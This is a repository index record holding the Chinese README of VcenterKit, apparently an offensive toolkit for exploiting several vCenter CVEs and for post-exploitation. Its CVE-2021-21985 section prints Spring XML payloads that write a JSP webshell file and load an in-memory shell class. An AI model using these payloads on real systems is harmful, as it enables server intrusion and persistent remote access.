{"id":13577712,"url":"https://github.com/W01fh4cker/VcenterKit","last_synced_at":"2025-04-05T12:31:07.527Z","repository":{"id":156963263,"uuid":"633233024","full_name":"W01fh4cker/VcenterKit","owner":"W01fh4cker","description":"Vcenter综合渗透利用工具包 | Vcenter Comprehensive Penetration and Exploitation Toolkit","archived":false,"fork":false,"pushed_at":"2023-11-01T06:51:57.000Z","size":103,"stargazers_count":947,"open_issues_count":1,"forks_count":135,"subscribers_count":17,"default_branch":"main","last_synced_at":"2024-08-02T15:34:47.711Z","etag":null,"topics":["cve-2021-21972","cve-2021-21985","cve-2021-22005","cve-2022-22954","cve-2022-22972","notebook","pentest","post-exploitation-toolkit","redteam","toolkit","vcenter"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/W01fh4cker.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-04-27T04:09:57.000Z","updated_at":"2024-08-02T02:52:29.000Z","dependencies_parsed_at":"2023-11-01T08:33:23.556Z","dependency_job_id":null,"html_url":"https://github.com/W01fh4cker/VcenterKit","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/W01fh4cker%2FVcenterKit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/W01fh4cker%2FVcenterKit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/W01fh4cker%2FVcenterKit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/W01fh4cker%2FVcenterKit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/W01fh4cker","download_url":"https://codeload.github.com/W01fh4cker/VcenterKit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247338658,"owners_count":20922992,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-21972","cve-2021-21985","cve-2021-22005","cve-2022-22954","cve-2022-22972","notebook","pentest","post-exploitation-toolkit","redteam","toolkit","vcenter"],"created_at":"2024-08-01T15:01:23.778Z","updated_at":"2025-04-05T12:31:02.514Z","avatar_url":"https://github.com/W01fh4cker.png","language":"Python","funding_links":[],"categories":["Python","Exploit Development Tools"],"sub_categories":["Forensics"],"readme":"![VcenterKit](https://socialify.git.ci/W01fh4cker/VcenterKit/image?description=1\u0026descriptionEditable=Vcenter%20Comprehensive%20Penetration%20and%20Exploitation%20Toolkit\u0026font=Rokkitt\u0026forks=1\u0026issues=1\u0026language=1\u0026logo=https%3A%2F%2Fs2.loli.net%2F2022%2F06%2F25%2FgUAh2V5CiD96y8G.jpg\u0026owner=1\u0026pattern=Circuit%20Board\u0026pulls=1\u0026stargazers=1)\n\n# 1. 使用说明(V 0.0.3)\n\n## 1.1 安装与启动  \n### 1.1.1  Windows环境\n\n推荐使用`Python3.9`\n\n```shell\npip install -r requirements.txt\npython VcenterKit.py\n```\npyinstaller打包命令如下（根据自身环境自行修改）：\n```\nC:\\Users\\Administrator\\AppData\\Local\\Programs\\Python\\Python39\\Scripts\\pyinstaller.exe --paths C:\\Users\\Administrator\\AppData\\Local\\Programs\\Python\\Python39\\Lib\\site-packages\\PyQt5\\Qt5\\bin -F -i logo.ico -w VcenterKit.py\n```  \n![image](https://github.com/W01fh4cker/VcenterKit/assets/101872898/6a823e1b-4a02-47fe-b176-abcd28dfe14c)\n\n\n### 1.1.2 Mac环境  \n非常感谢[outmansec](https://github.com/outmansec)师傅提出的针对`Mac`的修改版脚本的`pull request`。  \n```shell\npip install -r requirements_PyQt6.txt\npython VcenterKit_PyQt6.py\n```\n启动截图如下：  \n![image](https://github.com/W01fh4cker/VcenterKit/assets/101872898/ffa99211-3191-41b0-a898-6ba33f741dea)\n\n\n## 1.2 信息收集模块\n\n直接输入`url`即可进行信息搜集，如果存在本地文件读取的话，程序会自动读取数据库文件；有些网站是没有`sdk`接口的，也就无法通过这种方式来查询信息，后续会研究其他的方法：\n\n![](https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20230824001431.png)\n\n## 1.3 CVE-2021-21972模块\n\n主要利用思维导图如下：\n\n可以看到，并非所有情况下都能`100%`成功上传文件的，因此这里我把这些利用链（除了写`authorized_keys`）全部写在代码里面了，依次尝试。\n\n![](https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/9f185d40dfc9057818ed93226aeb279.png)\n\n这里放上之前测试利用搭建的环境的截图：\n\n![](https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/8bd245ffada0baa39a3059c73764bed.jpg)\n\n上传哥斯拉马：\n\n![11edd12a79387cb0d58d2a24b86ca10](https://github.com/W01fh4cker/VcenterKit/assets/101872898/3aac0b58-d2b7-49bd-a51e-5dc87e4f8845)\n\n\n## 1.4 CVE-2021-21985模块\n\n![image](https://github.com/W01fh4cker/VcenterKit/assets/101872898/e49cb0bb-0bbf-457b-b789-09ce3948a220)\n\n\n需要注意的是，这里的`RMI`和`Command`只能二选一填写，目前`rmi`由于测试环境的问题，还没有进行测试，可能会有问题，但是`command`目前测试下来没什么问题，这里放上一张之前写的时候测试的截图：\n\n![](https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/e39abf9b303b95372fa666e919cf705.png)\n\n需要注意的是，当前版本（`v0.0.3`）的`shell`上传和内存马打入模块还没实现。但是核心思想就是替换`xml`：\n\n\u003e  以下参考：https://daidaitiehanhan.github.io/2022/04/18/vCenter2021几个漏洞及后渗透/#不出网利用\n\n上传`shell`的`xml`：\n\n```xml\n\u003cbeans xmlns=\"http://www.springframework.org/schema/beans\"\n       xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n       xsi:schemaLocation=\"\n     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd\"\u003e\n    \u003cbean id=\"pb\" class=\"java.io.PrintWriter\"\u003e\n        \u003cconstructor-arg\u003e\n            \u003cvalue\u003e/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/log2.jsp\u003c/value\u003e\n        \u003c/constructor-arg\u003e\n    \u003c/bean\u003e\n    \u003cbean id=\"is\" class=\"java.lang.String\"\u003e\n        \u003cconstructor-arg\u003e\n            \u003cvalue\u003e\u003c![CDATA[\u003c% out.println(\"ok\"); %\u003e ]]\u003e\u003c/value\u003e\n        \u003c/constructor-arg\u003e\n        \u003cproperty name=\"whatever\" value=\"#{ pb.println(is).close()}\"/\u003e\n    \u003c/bean\u003e\n\u003c/beans\u003e\n```\n\n打内存马要用到的`xml`：\n\n```xml\n\u003cbeans xmlns=\"http://www.springframework.org/schema/beans\"\n       xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n       xsi:schemaLocation=\"\n     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd\"\u003e\n    \u003cbean id=\"pb\" class=\"com.sun.org.apache.bcel.internal.util.ClassLoader\"\u003e\n    \u003c/bean\u003e\n        \u003cbean id=\"is\" class=\"java.lang.String\"\u003e\n        \u003cconstructor-arg\u003e\n            \u003cvalue\u003e\u003c![CDATA[$$BCEL$$...]]\u003e\u003c/value\u003e\n        \u003c/constructor-arg\u003e\n        \u003cproperty name=\"whatever\" value=\"#{ pb.loadClass(is).newInstance()}\"/\u003e\n    \u003c/bean\u003e\n\u003c/beans\u003e\n```\n\n等后面有时间了写上，当然，你可以来写，然后提`pr`，我看到会第一时间回复。\n\n## 1.5 CVE-2021-22005模块\n\n这里的`shell name`可写可不写，不写的话就是自动生成`6`位的名字。\n\n![](https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20230824003746.png)\n\n测试截图：\n![](https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20230824003704.png)\n\n## 1.6 CVE-2022-22954\n\n测试截图如下：\n\n![](https://raw.githubusercontent.com/W01fh4cker/blog_image/main/6ef6d341978aaaa6f36bb894594ac47.png)\n\n## 1.7 CVE-2022-22972\n\n![](https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20230824004009.png)\n\n## 1.8 后渗透利用模块\n\n本来是想把这些脚本集成到工具里面的，但是转念一想，没必要，直接弄成点按钮生成脚本到本地这种形式就可以了，这样直接一个工具走天下。\n\n![](https://raw.githubusercontent.com/W01fh4cker/blog_image/main/20230827015200.png)\n\n## 1.9 渗透测试记事本\n\n这里我放上去了一些打vcenter的时候常用的命令、常看的文章。\n\n![](https://raw.githubusercontent.com/W01fh4cker/blog_image/main/e2ecc850aeca29a024a85fd08618e87.png)\n\n# 2. Q\u0026A\n\n## 2.1 代理问题？\n\n因为`vcenter`大多数位于内网，因此都是`proxifer`挂代理打，也就不怎么需要程序本身加个代理功能，我也懒得写了。\n\n## 2.2 长期维护吗？\n\n长期维护！本工具会和未来出的一系列工具，例如后面会开始写的`ExchangeKit`一样，都是我长期维护的项目，和之前的`Serein`( https://github.com/W01fh4cker/Serein )不一样（那个时候代码水平不行，加上`tkinter`做图形化太难受了，就不想维护了）。\n\n## 2.3 代码写的有逻辑问题/有bug/有新利用方式，如何沟通？\n\n类似的问题，直接提交`issues`( https://github.com/W01fh4cker/VcenterKit/issues )，描述清楚相关环境，和具体细节，我看到之后会在当天内回复，一般20分钟内就会回复（因为我的电子邮件可以实时收到消息）。\n\n如果有代码能力的话，欢迎提交`pull request`。\n\n## 2.4 想参与进来，共同维护？\n\n没问题，提交`pull request`，贡献代码。\n\n## 2.5 和其他工具相比的优缺点？\n\n`Akatsuki`师傅（ https://github.com/Schira4396 ）写的`VcenterKiller`是我非常喜欢的一个利用工具，我的`VcenterKit`与其定位并不相同，我这个是用于本地挂代理测试内网或者外网的`vcenter`漏洞，并且由于方便而弄了个`pyqt5`做图形化，这直接导致打包后的`exe`体积非常非常大；而`VcenterKiller`则是用`go`语言写的一款小巧的利用工具，可以直接传至对方服务器运行，也可以本地运行，可以跨平台，非常的方便。\n\n对于`CVE-2021-21972`这个漏洞而言，本工具可以自定义`shell`的名字，并且自动尝试数种利用链，用起来还是很舒服的，哈哈。\n\n工具只是辅助，写工具的过程是了解漏洞的很好的方式，从中获得经验，足矣。\n\n# 3. TODO\n\n* [ ] 研究`CVE-2021-21985`的上传`shell`和打内存马的方式\n* [ ] 你们提建议\n\n# 4. 微信公众号：追梦信安\n\n![](https://w01fh4cker-img-bed.oss-cn-hangzhou.aliyuncs.com/20230824010900.png)  \n# 5. Star History\n\n[![Star History Chart](https://api.star-history.com/svg?repos=W01fh4cker/VcenterKit\u0026type=Date)](https://star-history.com/#W01fh4cker/VcenterKit\u0026Date)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FW01fh4cker%2FVcenterKit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FW01fh4cker%2FVcenterKit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FW01fh4cker%2FVcenterKit/lists"}